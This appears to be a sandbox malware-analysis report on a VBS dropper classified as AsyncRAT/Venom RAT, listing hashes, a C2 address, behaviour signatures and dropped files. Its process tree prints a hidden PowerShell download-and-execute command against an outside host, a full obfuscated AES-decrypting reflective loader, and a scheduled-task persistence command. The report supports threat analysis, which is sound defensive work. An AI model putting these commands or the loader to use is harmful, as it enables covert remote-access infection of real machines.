Overview

overview

10

Static

static

1

6ddb80d5f6...ff.vbs

windows7-x64

8

6ddb80d5f6...ff.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-12-2024 02:35

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    6ddb80d5f672a132f45f9a0114d465aa35bb7d3b31aca5473b42a7174eb018ff.vbs

  • Size

    78KB

  • MD5

    870907ad00a8f53e022f042c92727d34

  • SHA1

    8789f00e533da9b0a8bd380b9264cfaefe8ff7bc

  • SHA256

    6ddb80d5f672a132f45f9a0114d465aa35bb7d3b31aca5473b42a7174eb018ff

  • SHA512

    32fbacd4338eced63990c4e0f7327fc3fc4282d497e95724445476f42acf8c1378238d345e5ba53afe86e39d860643657523b42cc5982832162e75cd7d68cde1

  • SSDEEP

    1536:KbiY5vZc5xg80mnBAH5JQGnDc3GiXs/P0Uese0A+giS5+p:giUvQYONp3Gi8/PW0Ats

Score
10/10
asyncrathp eliteexecutionrat

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

HP Elite

C2

45.88.88.7:4675

Mutex

gbchkhrksazddij

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • Async RAT payload 1 IoCs
    rat
  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6ddb80d5f672a132f45f9a0114d465aa35bb7d3b31aca5473b42a7174eb018ff.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2372
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1224
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1004
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nVzb+ZnULdRKJ8Pt1u0INEzxzJ9SAW0T4lv8svV35z4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1TJD7feNK15qiqdG0L0ERw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FnHYa=New-Object System.IO.MemoryStream(,$param_var); $tuGjJ=New-Object System.IO.MemoryStream; $ZPygJ=New-Object System.IO.Compression.GZipStream($FnHYa, [IO.Compression.CompressionMode]::Decompress); $ZPygJ.CopyTo($tuGjJ); $ZPygJ.Dispose(); $FnHYa.Dispose(); $tuGjJ.Dispose(); $tuGjJ.ToArray();}function execute_function($param_var,$param2_var){ $PWDPu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rNYVG=$PWDPu.EntryPoint; $rNYVG.Invoke($null, $param2_var);}$mhqzu = 'C:\Users\Admin\AppData\Local\Temp\system.bat';$host.UI.RawUI.WindowTitle = $mhqzu;$nhfYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($mhqzu).Split([Environment]::NewLine);foreach ($JOXWc in $nhfYw) { if ($JOXWc.StartsWith('gVggYAWWcClzlgdUqYRt')) { $eTtfZ=$JOXWc.Substring(20); break; }}$payloads_var=[string[]]$eTtfZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        3⤵
          PID:3124
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1764
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_483_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_483.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4240
          • C:\Windows\System32\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_483.vbs"
            4⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:1340
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_483.bat" "
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1860
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nVzb+ZnULdRKJ8Pt1u0INEzxzJ9SAW0T4lv8svV35z4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1TJD7feNK15qiqdG0L0ERw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FnHYa=New-Object System.IO.MemoryStream(,$param_var); $tuGjJ=New-Object System.IO.MemoryStream; $ZPygJ=New-Object System.IO.Compression.GZipStream($FnHYa, [IO.Compression.CompressionMode]::Decompress); $ZPygJ.CopyTo($tuGjJ); $ZPygJ.Dispose(); $FnHYa.Dispose(); $tuGjJ.Dispose(); $tuGjJ.ToArray();}function execute_function($param_var,$param2_var){ $PWDPu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rNYVG=$PWDPu.EntryPoint; $rNYVG.Invoke($null, $param2_var);}$mhqzu = 'C:\Users\Admin\AppData\Roaming\Windows_Log_483.bat';$host.UI.RawUI.WindowTitle = $mhqzu;$nhfYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($mhqzu).Split([Environment]::NewLine);foreach ($JOXWc in $nhfYw) { if ($JOXWc.StartsWith('gVggYAWWcClzlgdUqYRt')) { $eTtfZ=$JOXWc.Substring(20); break; }}$payloads_var=[string[]]$eTtfZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                6⤵
                  PID:756
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                  6⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of SetWindowsHookEx
                  PID:1592

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        2KB

        MD5

        b1e180583d3525f6534cc1110224a5fb

        SHA1

        b7cadce5826cdbe5b7a16cc6116522e7885882b7

        SHA256

        2e7e0e975fd986c9156ccaf646991dc1f1620e0330ff7b934dbdfd5a7c4567f7

        SHA512

        a8b64bd8c0709ae0440846e98d9e8023506c5fc3228c5a4bb2a5ae29bc310fb7cf833219766a1305b708bd7f1b21d76b3efa1169d5c7ffa09412d2a4bb600752

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
        Filesize

        2KB

        MD5

        005bc2ef5a9d890fb2297be6a36f01c2

        SHA1

        0c52adee1316c54b0bfdc510c0963196e7ebb430

        SHA256

        342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d

        SHA512

        f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        541a5e159ff40873705cb7ff14736a78

        SHA1

        bb700889966266b68f5d84531023fb11f1e794e1

        SHA256

        d111f2e0948557a56cc6867a41ca9d3a3d1294a30dfb6446e586e042aeeac89b

        SHA512

        f7fe93f1984e71b877ca8e956f9da322b5667a24a48419f34bbbfe3f9d7e5674d66aa8742de1e0b09a055cc75abcd255690313986efb52eeb63a5fb1f2aa64ec

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5vptzh2l.20x.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\system.bat
        Filesize

        70KB

        MD5

        b5d7889efc929af61649d13f17bf26ad

        SHA1

        44b1bb834ad5b3566dd4c758995bbedb2c2ba6b6

        SHA256

        3490b5a8d583c702b69506a047fc21135758b8dde44d77b9d102c3e4d4a4de01

        SHA512

        193db0b92d1595c8cfd3ecb31dd8cc2a23e3701319418a1b465bf0bc87c2708aedcd49b099bd6fe202bcca7a24f3df9bb792280abe95dce535e32f2f7ade4c3b

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Windows_Log_483.vbs
        Filesize

        115B

        MD5

        8144ea1e961e9d4aaa4b2e1c4f227490

        SHA1

        8b7edc79d3ac62abe6f44097461980b2522707f6

        SHA256

        c3cc13704d9e227a065862dc196e4e4eab80472b5c1c9a226fa4b65ddd5d818b

        SHA512

        7f3e121d7cf516e2393d70b5715fa8f14745afd5f994d2541278cd7ebf766223f07ee308c7c7e14a7e1b0407b274e9a013f5faeaef3ef07b7cc048db3ca25c4e

        Download Submit

      • memory/1224-12-0x00007FFBB5140000-0x00007FFBB5C01000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1224-16-0x00007FFBB5140000-0x00007FFBB5C01000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1224-17-0x00007FFBB5140000-0x00007FFBB5C01000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1224-13-0x00007FFBB5140000-0x00007FFBB5C01000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1224-0-0x00007FFBB5143000-0x00007FFBB5145000-memory.dmp

        Filesize

        8KB

        Download

      • memory/1224-11-0x00007FFBB5140000-0x00007FFBB5C01000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1224-10-0x0000021BFDCE0000-0x0000021BFDD02000-memory.dmp

        Filesize

        136KB

        Download

      • memory/1592-64-0x000001E1CAB30000-0x000001E1CAB48000-memory.dmp

        Filesize

        96KB

        Download

      • memory/1764-32-0x0000026EEAAD0000-0x0000026EEAB14000-memory.dmp

        Filesize

        272KB

        Download

      • memory/1764-33-0x0000026EEABA0000-0x0000026EEAC16000-memory.dmp

        Filesize

        472KB

        Download

      • memory/1764-34-0x0000026EEA730000-0x0000026EEA738000-memory.dmp

        Filesize

        32KB

        Download

      • memory/1764-35-0x0000026EEA740000-0x0000026EEA752000-memory.dmp

        Filesize

        72KB

        Download